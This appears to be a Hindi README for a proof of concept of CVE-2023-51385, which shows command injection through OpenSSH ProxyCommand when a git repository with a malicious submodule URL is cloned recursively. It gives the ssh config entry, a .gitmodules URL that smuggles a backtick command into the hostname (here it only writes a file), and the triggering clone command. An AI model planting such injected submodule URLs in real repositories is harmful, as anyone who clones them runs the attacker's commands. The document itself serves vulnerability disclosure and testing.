
CVE-2023-51385 के लिए प्रूफ-ऑफ-कॉन्सेप्ट: दुर्भावनापूर्ण git सबमॉड्यूल URL के माध्यम से कमांड इंजेक्शन प्रदर्शित करता है जब --recurse-submodules के साथ क्लोन किया जाता है, OpenSSH ProxyCommand का शोषण करता है।
सबसे पहले ~/.ssh/config में निम्नलिखित सामग्री जोड़ें
host *.example.com
ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p
.gitmodules फ़ाइल के स्टेटमेंट में कमांड इंजेक्शन मौजूद है
url = ssh://`echo helloworld > cve.txt`foo.example.com/bar
कॉन्फ़िगरेशन पूरा होने के बाद, नीचे दिए गए कमांड को निष्पादित करके ट्रिगर करें
git clone https://github.com/LtmThink/CVE-2023-51385_test --recurse-submodules
यदि सफलतापूर्वक निष्पादित होता है तो CVE-2023-51385_test निर्देशिका में cve.txt फ़ाइल बन जाएगी
नोट: OpenSSH को <9.6p1 की आवश्यकता है
विस्तृत जानकारी के लिए यह ब्लॉग देखें: